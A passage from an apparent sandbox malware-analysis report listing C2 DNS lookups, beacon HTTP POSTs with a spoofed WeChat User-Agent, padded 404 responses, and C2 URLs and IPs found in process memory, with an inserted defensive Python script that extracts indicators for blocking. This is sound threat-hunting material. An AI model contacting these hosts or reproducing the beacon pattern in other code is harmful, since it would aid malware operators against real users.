                  Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                  Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: cvgrf.biz
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: npukfztj.biz
                  Source: global trafficDNS traffic detected: DNS query: przvgke.biz
                  Source: global trafficDNS traffic detected: DNS query: ww7.przvgke.biz
                  Source: global trafficDNS traffic detected: DNS query: zlenh.biz
                  Source: global trafficDNS traffic detected: DNS query: knjghuig.biz
                  Source: global trafficDNS traffic detected: DNS query: uhxqin.biz
                  Source: global trafficDNS traffic detected: DNS query: anpmnmxo.biz
                  Source: global trafficDNS traffic detected: DNS query: lpuegx.biz
                  Source: global trafficDNS traffic detected: DNS query: ww12.przvgke.biz
                  Source: global trafficDNS traffic detected: DNS query: vjaxhpbji.biz
                  Source: global trafficDNS traffic detected: DNS query: xlfhhhm.biz
                  Source: global trafficDNS traffic detected: DNS query: ifsaia.biz
                  Source: global trafficDNS traffic detected: DNS query: saytjshyf.biz
                  Source: global trafficDNS traffic detected: DNS query: vcddkls.biz
                  Source: global trafficDNS traffic detected: DNS query: fwiwk.biz
                  Source: global trafficDNS traffic detected: DNS query: ww12.fwiwk.biz
                  Source: global trafficDNS traffic detected: DNS query: ww7.fwiwk.biz
                  Source: global trafficDNS traffic detected: DNS query: tbjrpv.biz
                  Source: global trafficDNS traffic detected: DNS query: deoci.biz
                  Source: global trafficDNS traffic detected: DNS query: gytujflc.biz
                  Source: global trafficDNS traffic detected: DNS query: qaynky.biz
                  Source: global trafficDNS traffic detected: DNS query: bumxkqgxu.biz
                  Source: global trafficDNS traffic detected: DNS query: dwrqljrr.biz
                  Source: global trafficDNS traffic detected: DNS query: nqwjmb.biz
                  Source: global trafficDNS traffic detected: DNS query: ytctnunms.biz
                  Source: global trafficDNS traffic detected: DNS query: myups.biz
                  Source: global trafficDNS traffic detected: DNS query: oshhkdluh.biz
                  Source: global trafficDNS traffic detected: DNS query: yunalwv.biz
                  Source: global trafficDNS traffic detected: DNS query: jpskm.biz
                  Source: global trafficDNS traffic detected: DNS query: lrxdmhrr.biz
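The HTTP and DNS rows above share one shape: a single spoofed WeChat/QQBrowser User-Agent, small fixed-size POSTs (784, 814 or 850 bytes) to random-looking paths on many short .biz domains, a follow-up GET to a ww7./ww12. subdomain carrying usid/utid parameters, and, before all of that, lookups of checkip.dyndns.org and reallyfreegeoip.org to learn the external IP and country. The following Python script is an added example, not part of the Joe Sandbox report or of the sample: it parses a subset of the rows above (copied verbatim as its input) into fields, classifies each request, flags the beaconing pattern and emits a domain list for blocking or hunting. The function names, the 1024-byte body threshold, the three-domain threshold and the two-label "registrable domain" shortcut are this example's own assumptions.

```python
"""Added example (not from the sandbox report): turn the report's run-together
'HTTP traffic detected' / 'DNS query' rows into indicators and flag beaconing.
Header names are used as field separators because the sandbox output drops the
CRLF between headers.  Thresholds and helper names are assumptions."""
import re
from collections import defaultdict

# Constructed input: a subset of the report's own rows, copied verbatim.
REPORT_LINES = [
    "Source: global trafficHTTP traffic detected: POST /xvuqxulkih HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850",
    "Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive",
    "Source: global trafficHTTP traffic detected: POST /mlvmnwk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850",
    "Source: global trafficHTTP traffic detected: POST /of HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850",
    "Source: global trafficHTTP traffic detected: GET /of?usid=20&utid=14164916598 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz",
    "Source: global trafficHTTP traffic detected: POST /dcbbaoyhlxdmix HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850",
    "Source: global trafficHTTP traffic detected: POST /j HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784",
    "Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive",
    "Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz",
    "Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org",
    "Source: global trafficDNS traffic detected: DNS query: przvgke.biz",
    "Source: global trafficDNS traffic detected: DNS query: ww7.przvgke.biz",
    "Source: global trafficDNS traffic detected: DNS query: zlenh.biz",
]

HEADER = r"(?:Host|User-Agent|Content-Length|Connection|Cache-Control|Pragma)"
REQ_RE = re.compile(r"HTTP traffic detected: (GET|POST) (\S+) HTTP/1\.[01]")
HOST_RE = re.compile(r"Host: ([a-z0-9.-]+?)(?=" + HEADER + r": |$)")
UA_RE = re.compile(r"User-Agent: (.+?)(?=" + HEADER + r": |$)")
CLEN_RE = re.compile(r"Content-Length: (\d+)")
DNS_RE = re.compile(r"DNS query: (\S+)$")

# Public-IP / geolocation services the sample queries before beaconing.
GEOIP_HOSTS = {"checkip.dyndns.org", "reallyfreegeoip.org"}


def parse_http(line):
    """Split one run-together HTTP row into fields; None for non-HTTP rows.
    Each header is found by name, since the sandbox output has no CRLFs."""
    m = REQ_RE.search(line)
    if not m:
        return None
    host, ua, clen = HOST_RE.search(line), UA_RE.search(line), CLEN_RE.search(line)
    return {
        "method": m.group(1),
        "path": m.group(2),
        "host": host.group(1) if host else "",
        "ua": ua.group(1).strip() if ua else "",
        "content_length": int(clen.group(1)) if clen else None,
    }


def classify(req):
    """Role of a request in the traffic the report shows."""
    if req["host"] in GEOIP_HOSTS:
        return "geoip-check"
    if req["method"] == "GET" and "usid=" in req["path"] and "utid=" in req["path"]:
        return "redirect-followup"   # GET to a ww7./ww12. host after a POST
    if req["method"] == "POST" and req["content_length"] and req["content_length"] < 1024:
        return "beacon"              # small fixed-size POST to a random path
    return "other"


def registrable(host):
    """Assumption: two-label registrable domain (holds for every .biz host here)."""
    return ".".join(host.split(".")[-2:])


def find_beaconing(requests, min_domains=3):
    """Flag a User-Agent that POSTs fixed-size bodies to many unrelated domains."""
    by_ua = defaultdict(lambda: {"domains": set(), "sizes": set(), "paths": set()})
    for r in requests:
        if classify(r) != "beacon":
            continue
        g = by_ua[r["ua"]]
        g["domains"].add(registrable(r["host"]))
        g["sizes"].add(r["content_length"])
        g["paths"].add(r["path"])
    return {ua: g for ua, g in by_ua.items() if len(g["domains"]) >= min_domains}


def extract_iocs(lines):
    """Indicators from the HTTP and DNS rows: suspect domains (including
    DNS-only ones), geo-IP lookups, and the User-Agents worth a proxy rule."""
    requests = [r for r in map(parse_http, lines) if r]
    dns = {m.group(1) for m in map(DNS_RE.search, lines) if m}
    geoip = {h for h in dns if h in GEOIP_HOSTS}
    geoip |= {r["host"] for r in requests if classify(r) == "geoip-check"}
    suspect = {registrable(d) for d in dns if d not in GEOIP_HOSTS}
    suspect |= {registrable(r["host"]) for r in requests
                if classify(r) in ("beacon", "redirect-followup")}
    uas = {r["ua"] for r in requests if classify(r) in ("beacon", "redirect-followup")}
    return {"suspect_domains": suspect, "geoip_hosts": geoip,
            "user_agents": uas, "beaconing": find_beaconing(requests)}


if __name__ == "__main__":
    iocs = extract_iocs(REPORT_LINES)
    for ua, g in iocs["beaconing"].items():
        print(f"beaconing UA {ua[:40]}... -> {sorted(g['domains'])} sizes={sorted(g['sizes'])}")
    print("suspect domains:", sorted(iocs["suspect_domains"]))
    print("geo-IP hosts:", sorted(iocs["geoip_hosts"]))
```

Run it as-is to see the flagged User-Agent and domain set, or replace REPORT_LINES with the full row list to get the complete blocklist. The geo-IP hosts are kept in their own bucket on purpose: they are legitimate services that many benign programs also query, so they belong in a correlation rule (geo-IP lookup followed by POSTs to newly seen domains) rather than on a blocklist.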
                  Source: unknownHTTP traffic detected: POST /crs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 808
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Wed, 15 Jan 2025 11:58:54 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Wed, 15 Jan 2025 11:58:55 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Wed, 15 Jan 2025 11:58:55 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 
Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Wed, 15 Jan 2025 11:59:01 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 
Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Wed, 15 Jan 2025 11:59:01 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 
Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: armsvc.exe, 0000000B.00000003.585874459.0000000001480000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.585848853.00000000019E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.exe
                  Source: armsvc.exe, 0000000B.00000002.639468285.00000000006C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://35.164.78.200/
                  Source: PO#_1100015533.scr, 00000008.00000002.387118499.00000000008A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://54.244.188.177/crs
                  Source: PO#_1100015533.scr, 00000008.00000002.387118499.00000000008A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://54.244.188.177/crsFLLcp
                  Source: armsvc.exe, 0000000B.00000002.639468285.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://54.244.188.177/rmrhacpx
                  Source: armsvc.exe, 0000000B.00000002.639468285.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://54.244.188.177/rmrhacpxL
                  Source: hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://72.52.178.23/ayokafkcxduc
                  Source: armsvc.exe, 0000000B.00000003.584866410.00000000006A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/savrhhv
                  Source: armsvc.exe, 0000000B.00000003.584866410.00000000006A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/yhhdkvr
                  Source: armsvc.exe, 0000000B.00000003.533723162.0000000001480000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                  Source: armsvc.exe, 0000000B.00000003.533723162.0000000001480000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                  Source: Microsofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.com
                  Source: Microsofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.comX
                  Source: Microsofts.exe, 0000000E.00000002.643206935.0000000002704000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
